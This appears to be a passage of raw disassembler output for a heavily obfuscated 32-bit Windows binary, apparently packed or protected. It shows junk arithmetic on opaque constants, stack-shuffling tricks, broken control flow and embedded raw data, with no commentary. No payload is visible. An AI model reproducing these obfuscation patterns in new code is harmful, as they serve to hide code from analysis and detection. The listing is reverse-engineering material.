dd 2809DEB7h, 4464C981h, 0C181631Fh, 0E6CAFA77h, 5F68CD03h
dd 0E900431Ah, 0FFFFFFABh, 4AE800h
db 3 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430F48
loc_43167B: ; CODE XREF: sub_430F48-B85�j
jmp loc_42FB2D
; END OF FUNCTION CHUNK FOR sub_430F48
; ---------------------------------------------------------------------------
dd 11D5E900h
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_431686 proc near ; CODE XREF: fzj3qwht:00430267�j
; fzj3qwht:004327D1�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042EC41 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0042F33B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042F3B0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FB23 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042FEB9 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043095D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00430B7C SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00430CA0 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004310C1 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043144D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431890 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431A12 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431C97 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00432306 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00432775 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043278E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00432921 SIZE 0000002E BYTES
xchg ecx, [esp+0]
xchg ebp, [esp+0]
mov ecx, ebp
pop ebp
pushf
push 389FB315h
jmp loc_432921
sub_431686 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_43169A: ; CODE XREF: fzj3qwht:loc_4312BC�j
and edx, 0D91DCBF9h
sub edx, 9A1D4C15h
add edx, 0B4B93569h
add edx, ebp
call sub_43041D
; ---------------------------------------------------------------------------
db 0
db 0
; ---------------------------------------------------------------------------
loc_4316B5: ; CODE XREF: fzj3qwht:00430854�j
jmp loc_42FB23
; ---------------------------------------------------------------------------
dw 0E900h
dd 3E2h, 0C5870000h, 59240C87h, 0E85D00C6h, 3F4h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431AED
loc_4316D0: ; CODE XREF: sub_431AED-8A3�j
jmp loc_42EE3D
; END OF FUNCTION CHUNK FOR sub_431AED
; ---------------------------------------------------------------------------
align 2
loc_4316D6: ; CODE XREF: fzj3qwht:loc_43050D�j
pop edi
and edi, 3F647BE2h
add edi, 0D768FF9h
add edi, ebp
add edi, 0B869600Dh
call near ptr dword_42F30C+11h
add [ecx+1F4718DEh], al
xchg eax, edx
jmp sub_42FF32
; ---------------------------------------------------------------------------
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_4316FE proc near ; CODE XREF: sub_42E990+B�j
; sub_431452+C92�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0042ED04 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F975 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004302F8 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00431965 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043249C SIZE 00000005 BYTES
xchg edx, [esp-4+arg_0]
pop edx
add edx, 496CA7E7h
push esi
mov esi, (offset loc_430CD8+1)
jmp loc_4302F8
sub_4316FE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 0E425810Fh, 0EFE8FFFFh, 0FFFFDAh
; ---------------------------------------------------------------------------
loc_431720: ; CODE XREF: fzj3qwht:00430AA7�j
jmp near ptr byte_42FABD+2
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 0A44h
; ---------------------------------------------------------------------------
loc_43172C: ; CODE XREF: fzj3qwht:loc_43162A�j
and edx, 3B3AB8D3h
xor edx, 7DC10DF5h
push 42F0E2h
jmp near ptr dword_42E8AC+0Eh
; ---------------------------------------------------------------------------
align 4
push ecx
mov ecx, esi
call sub_431C85
call ds:dword_42A0C0 ; ExitProcess
push edx
mov edx, esi
xchg edx, [esp]
jmp loc_432662
; ---------------------------------------------------------------------------
align 2
dw 0DA33h
dd 0E909C9C1h, 0FFFFE674h, 0A5CB6800h, 815A3CBCh, 0D2B757C2h
dd 96F2817Bh, 52614C8Fh, 430E38BAh, 0E197E900h, 0FFFFh
dd 0F3EE9C3h, 1C870000h, 1A196824h, 6EE90043h, 7, 0A2A7F681h
dd 92E98209h, 11h
db 0
byte_4317A9 db 81h, 0C0h, 8Bh ; DATA XREF: sub_430E27+9F3�o
dd 3A5AB89h, 18FF68C5h, 0FAE90043h, 0FFFFD0h
db 0
byte_4317BD db 8Bh, 9, 9Ch ; DATA XREF: sub_42F4AE-1AE�o
dd 43110568h, 0FFBFE900h, 0FFFFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FFDE
loc_4317CC: ; CODE XREF: sub_42FFDE+C�j
push offset word_430C4E
jmp loc_43146F
; END OF FUNCTION CHUNK FOR sub_42FFDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FA52
loc_4317D6: ; CODE XREF: sub_42FA52:loc_42F73C�j
xor esi, 36A6EEB7h
push offset loc_42FBAF
jmp nullsub_134
; END OF FUNCTION CHUNK FOR sub_42FA52
; ---------------------------------------------------------------------------
align 4
js loc_430F5C
jmp sub_430011
; ---------------------------------------------------------------------------
align 4
dd 6DFA8100h, 0E9706B58h, 0FEFh, 0E9C30000h, 0DA7h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43180A: ; CODE XREF: fzj3qwht:0042F1D4�j
jmp loc_432754
; ---------------------------------------------------------------------------
align 10h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430E27
loc_431811: ; CODE XREF: sub_430E27:loc_431FD9�j
rol eax, 11h
and eax, 0FDBE8957h
push offset byte_4317A9
jmp nullsub_142
; END OF FUNCTION CHUNK FOR sub_430E27
; ---------------------------------------------------------------------------
dd 24348700h, 0F85DF75Eh, 0F87D83h, 0FC17840Fh, 28E9FFFFh
dd 0C6FFFFE1h, 685F8707h, 0EEAC8EE1h, 8B240C87h, 0C88159C1h
dd 21CBB7AEh, 0EF09E081h, 7CE9E556h, 3, 19AFBB00h, 0FDE90043h
dd 68000009h, 7D525D7Ah, 1BC08158h, 815988F6h, 4E9BB8E0h
dd 9A5E920h, 0C30000h, 8701C600h, 0DE96859h, 9CE90043h
db 0E7h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
locret_43188F: ; CODE XREF: fzj3qwht:004313E6�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431686
loc_431890: ; CODE XREF: sub_431686+12C4�j
jmp loc_431C97
; END OF FUNCTION CHUNK FOR sub_431686
; ---------------------------------------------------------------------------
align 2
jmp locret_42FACC
; ---------------------------------------------------------------------------
align 4
dd 0DD8EE999h, 8700FFFFh, 2C872434h, 5DF58B24h, 0D1D6852h
dd 1BE9A353h, 1, 0E8CF8B00h, 0F1Eh
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_4318C2: ; CODE XREF: fzj3qwht:0042FAA2�j
jmp locret_42F981
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
loc_4318C9: ; CODE XREF: fzj3qwht:loc_42FACF�j
rol edi, 6
add edi, 5B5F65E4h
call sub_42FA52
mov esi, 6064ECEBh
jmp sub_42ED87
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
sub_4318E2 proc near ; CODE XREF: sub_431686+12AE�p
xchg edi, [esp+0]
pop edi
add edx, 0C483AE96h
stosd
call sub_431E7D
retn
sub_4318E2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4318F3: ; CODE XREF: fzj3qwht:004306FC�j
jmp near ptr loc_430062+4
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_4318F9: ; CODE XREF: sub_42F4AE+20A�j
jmp locret_42F525
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
dw 8100h
dd 0BE6D1EC0h
db 71h, 8Bh, 0
byte_431907 db 15h ; DATA XREF: fzj3qwht:0042FBB2�o
dd 0FFECC6E8h, 726857FFh, 0E9B2B75Ah, 0FFFFE45Fh
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FA52
loc_43191A: ; CODE XREF: sub_42FA52:loc_42F736�j
push edx
push 0E6F12C6Ch
pop edx
or edx, 0E7BBA961h
rol edx, 13h
xor edx, 0F8335E68h
add edx, 6CE6A87Ch
jmp loc_42FE43
; END OF FUNCTION CHUNK FOR sub_42FA52
; =============== S U B R O U T I N E =======================================
sub_43193B proc near ; DATA XREF: fzj3qwht:loc_430248�o
mov byte ptr [esi], 0C7h
pop esi
add edx, ebp
call loc_43099D
sub_43193B endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_431452
loc_431946: ; CODE XREF: sub_431452+DF�j
jmp loc_4320D8
; END OF FUNCTION CHUNK FOR sub_431452
; ---------------------------------------------------------------------------
align 4
dd 0D682820Fh, 0C5B8FFFFh, 0E9A63BDBh, 0FFFFD925h
db 0
; ---------------------------------------------------------------------------
loc_43195D: ; CODE XREF: fzj3qwht:loc_432633�j
xchg esi, [esp]
mov ebp, esi
pop esi
retn
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4316FE
loc_431965: ; CODE XREF: sub_4316FE-13FE�j
push edi
mov edi, ebp
xchg edi, [esp+0]
jmp loc_42ED04
; END OF FUNCTION CHUNK FOR sub_4316FE
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F5F
loc_431971: ; CODE XREF: sub_431F5F-151F�j
call sub_43052F
loc_431976: ; CODE XREF: fzj3qwht:0043024D�j
add cl, ch
sub ch, dh
; END OF FUNCTION CHUNK FOR sub_431F5F
; ---------------------------------------------------------------------------
dw 0FFFFh
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F188
loc_43197D: ; CODE XREF: sub_42F188+1A�j
jmp loc_42F9E4
; END OF FUNCTION CHUNK FOR sub_42F188
; ---------------------------------------------------------------------------
jmp loc_431D6D
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
loc_431989: ; CODE XREF: fzj3qwht:0042EB73�j
xchg edi, [esp]
pop edi
push edx
mov edx, offset loc_431EE7
jmp loc_42FC56
; ---------------------------------------------------------------------------
dd 0E93E8900h, 701h
db 0
byte_4319A1 db 87h, 0Ch, 24h ; DATA XREF: fzj3qwht:loc_42F7FD�o
dd 0FFE191E9h, 0EDB800FFh, 0BC00424Fh, 6C84C6C0h, 52FFFFE1h
dd 0FFFDACE9h, 81F91BFFh, 29B569C2h, 81C2D16Ah, 4F1770C2h
dd 0DD4FE864h, 0D5E9FFFFh, 0FFFFD3h
; ---------------------------------------------------------------------------
loc_4319D8: ; CODE XREF: fzj3qwht:0043030E�j
jmp loc_431BFC
; ---------------------------------------------------------------------------
db 2 dup(0), 81h
; ---------------------------------------------------------------------------
retn 0FEADh
; ---------------------------------------------------------------------------
db 87h
dd 0AEFC1B7h, 0FFF53DE9h, 520000FFh, 0C813FC68h, 0EA815AA4h
dd 0F57473FAh, 5FFDC281h, 148750ACh, 0C015FF24h, 0E80042A0h
dd 0FFFFFBC6h
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431686
loc_431A12: ; CODE XREF: sub_431686-1B5E�j
jmp nullsub_161
; END OF FUNCTION CHUNK FOR sub_431686
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_431410
loc_431A18: ; CODE XREF: sub_431410+63F�j
add [ebx-2E74AD14h], cl
call sub_42E990
; END OF FUNCTION CHUNK FOR sub_431410
; ---------------------------------------------------------------------------
db 0
db 0
; ---------------------------------------------------------------------------
loc_431A25: ; CODE XREF: fzj3qwht:00430EDD�j
jmp loc_4307D0
; ---------------------------------------------------------------------------
test edx, 534A64Fh
jmp loc_431ABE
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431410
loc_431A37: ; CODE XREF: sub_431410:loc_4320F3�j
and edi, 9E9541A6h
xor edi, 30BBA9E9h
and edi, 0CAB6433h
add edi, 0FBD5E001h
jecxz short loc_431A18
pop edi
jmp near ptr byte_42E955+2
; END OF FUNCTION CHUNK FOR sub_431410
; ---------------------------------------------------------------------------
loc_431A57: ; CODE XREF: fzj3qwht:loc_432008�j
pop esi
call sub_431F38
; ---------------------------------------------------------------------------
db 2 dup(0), 81h
dd 15B89CC1h, 9D098BB2h, 0E8240C87h, 0FFFFD50Dh
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_431A72: ; CODE XREF: fzj3qwht:0042F2CE�j
mov al, [ebp+eax-20h]
push 520DBE92h
pop edx
and edx, 4F7911A5h
call sub_430497
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431452
loc_431A88: ; CODE XREF: sub_431452+8E8�j
jmp nullsub_135
; END OF FUNCTION CHUNK FOR sub_431452
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_431A8F: ; CODE XREF: sub_431686+10F7�j
; sub_42F8A9:loc_432782�p
xchg edx, [esp]
pop edx
xchg esi, [esp]
loc_431A96: ; DATA XREF: sub_42EFCF:loc_43077E�o
xor al, 15h
shl byte ptr [eax+4EE90042h], 0FFh
; ---------------------------------------------------------------------------
db 0FFh
dd 2C600FFh, 98685A87h, 87769D88h, 0D98B240Ch, 0EAC38159h
dd 0E9B5B81Ch, 0FFFFDECFh
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_431ABE: ; CODE XREF: fzj3qwht:00431A30�j
js near ptr byte_42F52D+2
xchg ebx, [esp]
pop ebx
inc dword ptr [ebp-8Ch]
jmp near ptr dword_430254
; ---------------------------------------------------------------------------
db 0Fh
dd 3DB8Ch, 9C000000h, 0FFDA0DE9h
; ---------------------------------------------------------------------------
loc_431AE0: ; DATA XREF: sub_431686:loc_42FB23�o
jmp fword ptr [eax-2Bh]
; ---------------------------------------------------------------------------
db 0Dh
dd 0ABE90043h, 0FFFFFDh
db 0
; =============== S U B R O U T I N E =======================================
sub_431AED proc near ; CODE XREF: fzj3qwht:0042EA3A�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042EE3D SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00431239 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004316D0 SIZE 00000005 BYTES
xchg ecx, [esp-4+arg_0]
pop ecx
xchg ecx, [esp+0]
mov eax, ecx
pop ecx
pop edi
inc esi
or al, 24h
push ecx
jmp loc_431239
sub_431AED endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 2
; START OF FUNCTION CHUNK FOR sub_4323E7
loc_431B02: ; CODE XREF: sub_4323E7+C�j
xchg ebx, [esp+0]
push 4816C813h
pop esi
xor esi, 0ACE55FE9h
and esi, 0F3FC4FE0h
xor esi, 0BE4C83A8h
rol esi, 1Bh
jmp loc_431BC3
; END OF FUNCTION CHUNK FOR sub_4323E7
; ---------------------------------------------------------------------------
db 2 dup(0), 13h
; ---------------------------------------------------------------------------
setalc
jmp loc_4327CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4312D7
loc_431B2E: ; CODE XREF: sub_4312D7-101B�j
add eax, ebp
call sub_430F2A
; END OF FUNCTION CHUNK FOR sub_4312D7
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_431B37: ; CODE XREF: fzj3qwht:0042EDA5�j
jmp loc_431EE7
; ---------------------------------------------------------------------------
dd 815F0000h, 349DCCEAh, 0AC28182h, 3FB7BD8h, 0EB1DE8D5h
dd 0FFFFh, 850FA43Ch, 0FFFFE181h, 0FFE173E8h
db 0FFh
; ---------------------------------------------------------------------------
loc_431B61: ; CODE XREF: fzj3qwht:0043250B�j
jmp loc_430ED7
; ---------------------------------------------------------------------------
align 4
jmp loc_42FA99
; ---------------------------------------------------------------------------
align 2
dw 0C231h
dd 0AB850F49h, 87000008h, 3AE9243Ch, 0FFFFFDh
db 0
; ---------------------------------------------------------------------------
loc_431B81: ; CODE XREF: fzj3qwht:004300A5�j
jnz loc_431E16
jmp locret_430985
; ---------------------------------------------------------------------------
dd 0EA810000h, 595CA7E1h, 27BE9h, 8B000000h, 0E91F890Bh
dd 0FFFFDB7Dh, 33F88100h, 0E947FBE5h, 0FFFFE96Fh, 0C2875868h
dd 0E881587Bh, 49C92848h, 0F810890Fh
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4323E7
loc_431BC3: ; CODE XREF: sub_4323E7-8C7�j
jmp loc_42EB3D
; END OF FUNCTION CHUNK FOR sub_4323E7
; ---------------------------------------------------------------------------
dd 0FFD7CEE9h, 990000FFh, 0FFF7FBE9h, 810000FFh, 0FC6CDCC0h
dd 24041F1Ah, 0FFDE29E9h, 266853FFh, 0E900430Bh, 0FFFFEF30h
dd 22CF8100h, 0E9A63689h, 0FFFFCFE1h
; ---------------------------------------------------------------------------
loc_431BFC: ; CODE XREF: fzj3qwht:loc_4319D8�j
xchg ecx, [esp]
mov esi, offset nullsub_158
jmp loc_432833
; ---------------------------------------------------------------------------
db 68h, 77h, 0D2h
dd 815E3B45h, 56E3DDEEh, 65C6819Fh, 0E9641111h, 0FFFFD80Eh
dd 19CFC100h, 0F2E93A87h, 0FFFFE7h
; ---------------------------------------------------------------------------
loc_431C2C: ; CODE XREF: fzj3qwht:004303E6�j
or ebx, 0C5398E05h
xor ebx, 0E77BFF2Fh
add edx, ebx
pop ebx
call near ptr dword_42EC68+6Dh
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C13
loc_431C41: ; CODE XREF: sub_430C13+12�j
jmp loc_43013E
; END OF FUNCTION CHUNK FOR sub_430C13
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_431C47: ; CODE XREF: fzj3qwht:0042FCE1�j
mov eax, 43247Ch
jmp loc_42E950
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
sub_431C52 proc near ; CODE XREF: sub_431452:loc_430598�p
xchg ebx, [esp+0]
pop ebx
push esi
push offset word_432066
jmp near ptr dword_42E794+70h
sub_431C52 endp
; ---------------------------------------------------------------------------
align 2
dw 0F381h
dd 2152B297h, 0FFF6B6E9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
; START OF FUNCTION CHUNK FOR sub_42F188
loc_431C6E: ; CODE XREF: sub_42F188+864�j
push eax
loc_431C6F: ; CODE XREF: sub_42F188:loc_42F9E4�j
rol esi, 0Fh
xor esi, 1148308Eh
sbb eax, 0EFEDE8F5h
; END OF FUNCTION CHUNK FOR sub_42F188
; ---------------------------------------------------------------------------
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
jmp loc_43214C
; =============== S U B R O U T I N E =======================================
sub_431C85 proc near ; CODE XREF: fzj3qwht:00431747�p
arg_0 = dword ptr 4
xchg esi, [esp+0]
pop esi
xchg ecx, [esp-4+arg_0]
mov esi, 430ACAh
jmp near ptr dword_431018+2
sub_431C85 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431686
loc_431C97: ; CODE XREF: sub_431686:loc_431890�j
jz loc_43144D
jmp near ptr dword_42EEA4+1Bh
; END OF FUNCTION CHUNK FOR sub_431686
; ---------------------------------------------------------------------------
dw 0E800h
dd 0FFFFCD8Bh, 754E900h, 0E95A0000h, 6F6h, 9A870F00h, 0E9000009h
dd 0FFFFFBE3h, 8713E8C1h
db 0Ah
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301AC
loc_431CC5: ; CODE XREF: sub_4301AC:loc_42FC85�j
sub eax, 0A4B4D852h
add eax, 62EF0A92h
call sub_430F48
jmp loc_4315EA
; END OF FUNCTION CHUNK FOR sub_4301AC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_43005C
loc_431CDC: ; CODE XREF: sub_43005C+1D�j
jmp loc_42EEC6
; END OF FUNCTION CHUNK FOR sub_43005C
; ---------------------------------------------------------------------------
db 0E9h, 0D4h, 0EFh
dd 0FFFFh, 0E9E9C687h, 5EFFFFE4h, 33E3E981h, 685283CBh
dd 82CC6D06h, 77E2815Ah, 81543177h, 0B08AD0F2h, 9EFA810Eh
dd 0E94CC6B9h, 0FFFFFDBFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F5F
loc_431D14: ; CODE XREF: sub_431F5F-D65�j
pop ebx
jmp loc_431E9F
; END OF FUNCTION CHUNK FOR sub_431F5F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43052F
loc_431D1A: ; CODE XREF: sub_43052F:loc_431E31�j
call nullsub_146
nop
call sub_430917
; END OF FUNCTION CHUNK FOR sub_43052F
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431452
loc_431D26: ; CODE XREF: sub_431452:loc_431475�j
mov byte ptr [eax], 3
pop eax
push ebp
mov ebp, ebx
xchg ebp, [esp+4+var_4]
mov ebx, edx
xchg ebx, [esp+4+var_4]
push offset loc_42EEE9
jmp loc_431A88
; END OF FUNCTION CHUNK FOR sub_431452
; ---------------------------------------------------------------------------
align 10h
db 0
; ---------------------------------------------------------------------------
loc_431D41: ; CODE XREF: fzj3qwht:00432761�j
jl near ptr dword_42EC68+1
; ---------------------------------------------------------------------------
db 0
dd 238E900h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_431D4E: ; CODE XREF: fzj3qwht:0042F4A8�j
jmp loc_430935
; ---------------------------------------------------------------------------
align 4
dd 0E649E900h, 819DFFFFh, 302A1DEEh, 0CF03E945h, 0FFFFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301AC
loc_431D68: ; CODE XREF: sub_4301AC+6�j
call sub_430315
loc_431D6D: ; CODE XREF: fzj3qwht:00431982�j
sub eax, 3B8F4D56h
and eax, 4A0E5340h
cmp eax, 75D11C6Eh
jmp loc_42FC85
; END OF FUNCTION CHUNK FOR sub_4301AC
; ---------------------------------------------------------------------------
dd 1C870000h, 0FD035B24h, 8927C781h, 3F8B8634h, 0FFEB5DE9h
dd 36C1F7FFh, 0E925E99Eh, 878h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301AC
loc_431DA4: ; CODE XREF: sub_4301AC:loc_4315EA�j
; sub_4301AC+1452�j
and eax, 4F16BEBCh
push edi
push 8611541h
pop edi
add edi, 269821EEh
or edi, 0D153DC74h
add edi, 5CE6AE0Dh
sub edi, 281C5ADh
jmp loc_430C2F
; END OF FUNCTION CHUNK FOR sub_4301AC
; ---------------------------------------------------------------------------
byte_431DCE db 0Fh ; DATA XREF: fzj3qwht:0042E85D�w
; sub_431167-2252�o
db 85h
dd 0FFFFD699h, 4300AC68h, 0F017E900h, 0FFFFh, 0E1348B0Fh
dd 71E9FFFFh, 0FFFFF6h, 0AA8EC081h, 689CF1A3h, 430392h
dd 0FFE58BE9h, 0E6C100FFh, 0EF3DE913h
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_431E06: ; CODE XREF: fzj3qwht:00430B21�j
rol ebx, 1Eh
push ecx
mov ecx, offset byte_430D4D
jmp near ptr dword_42E9A4+13h
; ---------------------------------------------------------------------------
xchg ecx, [edi]
loc_431E16: ; CODE XREF: fzj3qwht:loc_431B81�j
add esi, 795C550Eh
mov esi, [esi]
call near ptr dword_42F064+10h
; ---------------------------------------------------------------------------
db 0
dd 1B03B800h, 4BE9E0B7h, 0FFFFF6h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43052F
loc_431E31: ; CODE XREF: sub_43052F+8�j
jz loc_431D1A
push eax
push 0A569401Bh
pop eax
or eax, 27B29BAh
sub eax, 218496B2h
add eax, 90613033h
xor eax, 0AE711640h
jmp loc_43058C
; END OF FUNCTION CHUNK FOR sub_43052F
; ---------------------------------------------------------------------------
db 5Fh
dd 0FFE207E9h, 0F0000FFh, 0FFD4A686h
db 0FFh
; =============== S U B R O U T I N E =======================================
sub_431E69 proc near ; CODE XREF: fzj3qwht:0042F8F6�p
; FUNCTION CHUNK AT 00430F79 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00432872 SIZE 0000000E BYTES
xchg eax, [esp+0]
pop eax
add eax, 0DF0BADACh
add eax, ebp
push eax
jmp loc_430F79
sub_431E69 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
sub_431E7D proc near ; CODE XREF: sub_4318E2+B�p
arg_0 = dword ptr 4
xchg edi, [esp+0]
pop edi
xchg edx, [esp-4+arg_0]
jmp near ptr loc_42F8FB+1
sub_431E7D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 0FFFFEF72h, 0C30000h
; ---------------------------------------------------------------------------
loc_431E94: ; CODE XREF: fzj3qwht:0042FB78�j
jmp loc_42FE63
; ---------------------------------------------------------------------------
align 2
call sub_4323E7
; START OF FUNCTION CHUNK FOR sub_431F5F
loc_431E9F: ; CODE XREF: sub_431F5F-24A�j
jmp loc_430B0E
; END OF FUNCTION CHUNK FOR sub_431F5F
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_431EA6: ; CODE XREF: sub_42F4AE+46�j
jz loc_42FDFF
mov [esi], edi
jge loc_42FBA7
rol edx, 1Eh
add edx, 0FC87D7E0h
cmp ecx, edx
pop edx
jmp near ptr dword_42F3E0+1
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
align 2
loc_431EC6: ; CODE XREF: fzj3qwht:loc_430758�j
push esi
mov esi, 42E9FCh
jmp loc_430248
; ---------------------------------------------------------------------------
align 2
mov byte ptr [ecx], 83h
xchg eax, [esp]
mov ecx, eax
pop eax
push 31C06743h
push edx
jmp loc_432061
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_431EE7: ; CODE XREF: fzj3qwht:loc_431B37�j
; DATA XREF: fzj3qwht:0043198E�o
stosb
call sub_430E27
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 0FFFFFDFBh
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431452
loc_431EF6: ; CODE XREF: sub_431452+3A�j
jmp nullsub_132
; END OF FUNCTION CHUNK FOR sub_431452
; ---------------------------------------------------------------------------
align 4
dd 0FFCBB9E9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_138. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_431F03: ; CODE XREF: fzj3qwht:00432685�j
jmp near ptr dword_42F6C0+9
; ---------------------------------------------------------------------------
db 0, 0C3h
; ---------------------------------------------------------------------------
loc_431F0A: ; CODE XREF: fzj3qwht:0042FC7E�j
jmp loc_4306DE
; ---------------------------------------------------------------------------
align 10h
db 0
; =============== S U B R O U T I N E =======================================
sub_431F11 proc near ; CODE XREF: fzj3qwht:0042F427�j
; sub_431452+11A4�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042E938 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00431388 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043270D SIZE 00000016 BYTES
xchg esi, [esp+0]
pop esi
pop eax
sub eax, edx
jmp loc_431388
sub_431F11 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_431F1F proc near ; CODE XREF: fzj3qwht:004303C8�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00430450 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043080B SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
mov byte ptr [ebx], 3
xchg esi, [esp+0]
mov ebx, esi
pop esi
mov esi, 42E7E7h
jmp loc_43080B
sub_431F1F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_431F38 proc near ; CODE XREF: fzj3qwht:00431A58�p
; FUNCTION CHUNK AT 00432279 SIZE 0000001E BYTES
xchg edx, [esp+0]
pop edx
push eax
mov eax, offset byte_431499
jmp loc_432279
sub_431F38 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FA52
loc_431F49: ; CODE XREF: sub_42FA52:loc_43273D�j
xchg ebx, [esp+4+var_4]
push offset byte_430E75
jmp nullsub_136
; END OF FUNCTION CHUNK FOR sub_42FA52
; ---------------------------------------------------------------------------
dw 0C100h
dd 0B6E916CEh
